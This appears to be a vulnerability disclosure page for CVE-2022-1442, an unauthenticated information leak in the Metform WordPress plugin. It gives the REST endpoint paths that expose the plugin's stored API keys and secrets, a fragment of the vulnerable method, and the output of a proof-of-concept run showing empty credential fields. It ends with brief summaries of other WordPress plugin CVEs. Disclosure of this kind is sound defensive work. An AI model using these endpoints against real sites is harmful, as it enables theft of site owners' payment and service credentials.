The Metform WordPress plugin is vulnerable to sensitive information disclosure due to improper access control in the ~/core/forms/action.php file which can be exploited by an unauthenticated attacker to view all API keys and secrets of integrated third-party APIs like that of PayPal, Stripe, Mailchimp, Hubspot, HelpScout, reCAPTCHA and many more, in versions up to and including 2.1.3.

Metform contact form builder is an addon for elementor used to build any contact form on the fly with Metform drag and drop builder. It can manage multiple contact forms and one can customize the form with an elementor builder. Metform can be integrated with various third-party APIs.

API keys and secrets of third-part integrations can be added and viewed by Wordpress admins.

**Vulnerability**: The Metform WordPress plugin is vulnerable to sensitive information disclosure due to improper access control in the ~/core/forms/action.php file which can be exploited by an unauthenticated attacker to view all API keys and secrets of integrated third-party APIs like that of PayPal, Stripe, Mailchimp, Hubspot, HelpScout, reCAPTCHA and many more, in versions up to and including 2.1.3.

/wp-json/metform/v1/forms/templates/0

/wp-json/metform/v1/forms/get/{form\_id\_here}

It will list all the juicy stuff.

/wp-content/plugins/metform/core/forms/action.php#L185 Vulnerable Method: get\_all\_data

	public function get\_all\_data($post\_id) {

		$post = get\_post($post\_id);
...
...
		return $all\_settings;

	}

λ python poc.py

WordPress URL: http://192.168.0.112

Form ID: 123, Form Title: SomeFormTitle
{
    "admin\_email\_attach\_submission\_copy": "",
    "admin\_email\_body": "",
    "admin\_email\_from": "",
    "admin\_email\_reply\_to": "",
    "admin\_email\_subject": "",
    "admin\_email\_to": "",
    "aweber\_opt": \[\],
    "capture\_user\_browser\_data": "",
    "ckit\_opt": \[\],
    "count\_views": "",
    "email\_verification\_confirm\_redirect": "",
    "email\_verification\_email\_subject": "",
    "email\_verification\_enable": "",
    "email\_verification\_heading": "",
    "email\_verification\_paragraph": "",
    "enable\_admin\_notification": "",
    "enable\_recaptcha": "",
    "enable\_user\_notification": "",
    "entry\_title": "",
    "failed\_cancel\_url": "",
    "form\_title": "",
    "hide\_form\_after\_submission": "",
    "input\_names": "",
    "limit\_total\_entries": "",
    "limit\_total\_entries\_status": "",
    "mf\_active\_campaign": "",
    "mf\_active\_campaign\_api\_key": "",
    "mf\_active\_campaign\_list\_id": "",
    "mf\_active\_campaign\_tag\_id": "",
    "mf\_active\_campaign\_url": "",
    "mf\_automizy": "",
    "mf\_automizy\_api\_token": "",
    "mf\_automizy\_list\_id": "",
    "mf\_aweber\_dev\_api\_key": "",
    "mf\_aweber\_dev\_api\_sec": "",
    "mf\_aweber\_list\_id": "",
    "mf\_ckit\_api\_key": "",
    "mf\_ckit\_list\_id": "",
    "mf\_ckit\_sec\_key": "",
    "mf\_convert\_kit": "",
    "mf\_fluent": "",
    "mf\_fluent\_webhook": "",
    "mf\_form\_to\_post": "",
    "mf\_get\_reponse\_api\_key": "",
    "mf\_get\_response": "",
    "mf\_get\_response\_list\_id": "",
    "mf\_google\_map\_api\_key": "",
    "mf\_google\_sheet": "",
    "mf\_google\_sheet\_client\_id": "",
    "mf\_google\_sheet\_client\_secret": "",
    "mf\_helpscout": "",
    "mf\_helpscout\_app\_id": "",
    "mf\_helpscout\_app\_secret": "",
    "mf\_helpscout\_conversation\_customer\_email": "",
    "mf\_helpscout\_conversation\_customer\_first\_name": "",
    "mf\_helpscout\_conversation\_customer\_last\_name": "",
    "mf\_helpscout\_conversation\_customer\_message": "",
    "mf\_helpscout\_conversation\_subject": "",
    "mf\_helpscout\_mailbox": "",
    "mf\_helpscout\_token": "",
    "mf\_hubsopt\_token": "",
    "mf\_hubspot": "",
    "mf\_hubspot\_form\_guid": "",
    "mf\_hubspot\_form\_portalId": "",
    "mf\_hubspot\_forms": "",
    "mf\_login": "",
    "mf\_mail\_aweber": "",
    "mf\_mail\_chimp": "",
    "mf\_mail\_poet": "",
    "mf\_mail\_poet\_list\_id": "",
    "mf\_mailchimp\_api\_key": "",
    "mf\_mailchimp\_list\_id": "",
    "mf\_mailster": "",
    "mf\_mailster\_fields": "",
    "mf\_mailster\_list\_id": "",
    "mf\_payment\_currency": "",
    "mf\_paypal": "",
    "mf\_paypal\_email": "",
    "mf\_paypal\_sandbox": "",
    "mf\_paypal\_token": "",
    "mf\_post\_submission\_author": "",
    "mf\_post\_submission\_content": "",
    "mf\_post\_submission\_featured\_image": "",
    "mf\_post\_submission\_post\_type": "",
    "mf\_post\_submission\_title": "",
    "mf\_recaptcha": "",
    "mf\_recaptcha\_secret\_key": "",
    "mf\_recaptcha\_secret\_key\_v3": "",
    "mf\_recaptcha\_site\_key": "",
    "mf\_recaptcha\_site\_key\_v3": "",
    "mf\_recaptcha\_version": "",
    "mf\_registration": "",
    "mf\_rest\_api": "",
    "mf\_rest\_api\_method": "",
    "mf\_rest\_api\_url": "",
    "mf\_slack": "",
    "mf\_slack\_webhook": "",
    "mf\_sms\_admin\_body": "",
    "mf\_sms\_admin\_status": "",
    "mf\_sms\_admin\_to": "",
    "mf\_sms\_from": "",
    "mf\_sms\_status": "",
    "mf\_sms\_twilio\_account\_sid": "",
    "mf\_sms\_twilio\_auth\_token": "",
    "mf\_sms\_user\_body": "",
    "mf\_sms\_user\_status": "",
    "mf\_stop\_vertical\_scrolling": "",
    "mf\_stripe": "",
    "mf\_stripe\_image\_url": "",
    "mf\_stripe\_live\_publishiable\_key": "",
    "mf\_stripe\_live\_secret\_key": "",
    "mf\_stripe\_sandbox": "",
    "mf\_stripe\_test\_publishiable\_key": "",
    "mf\_stripe\_test\_secret\_key": "",
    "mf\_thank\_you\_page": "",
    "mf\_zapier": "",
    "mf\_zapier\_webhook": "",
    "mf\_zoho": "",
    "mf\_zoho\_token": "",
    "mp\_opt": \[\],
    "multiple\_submission": "",
    "redirect\_to": "",
    "require\_login": "",
    "store\_entries": "1",
    "success\_message": "",
    "success\_url": "",
    "user\_email\_attach\_submission\_copy": "",
    "user\_email\_body": "",
    "user\_email\_from": "",
    "user\_email\_reply\_to": "",
    "user\_email\_subject": ""
}

CVE-2022-1442: WordPress Plugin Metform <= 2.1.3 - Improper Access Control Allowing Unauthenticated Sensitive Information Disclosure

CVE-2022-1442: Vulnerability Advisories - Wordfence

The WP Social Buttons WordPress plugin through 2.1 does not sanitise and escape its settings, allowing high privilege users such as admin to perform cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.

CVE-2022-0874

The IgniteUp WordPress plugin through 3.4.1 does not sanitise and escape some fields when high privilege users don't have the unfiltered_html capability, which could lead to Stored Cross-Site Scripting issues

CVE-2022-0898

The SEMA API WordPress plugin through 3.64 does not properly sanitise and escape some parameters before using them in SQL statements via an AJAX action, leading to SQL Injections exploitable by unauthenticated users

CVE-2022-0836

The WP Video Gallery WordPress plugin through 1.7.1 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action, leading to an SQL Injection exploitable by unauthenticated users

Tag

#wordpress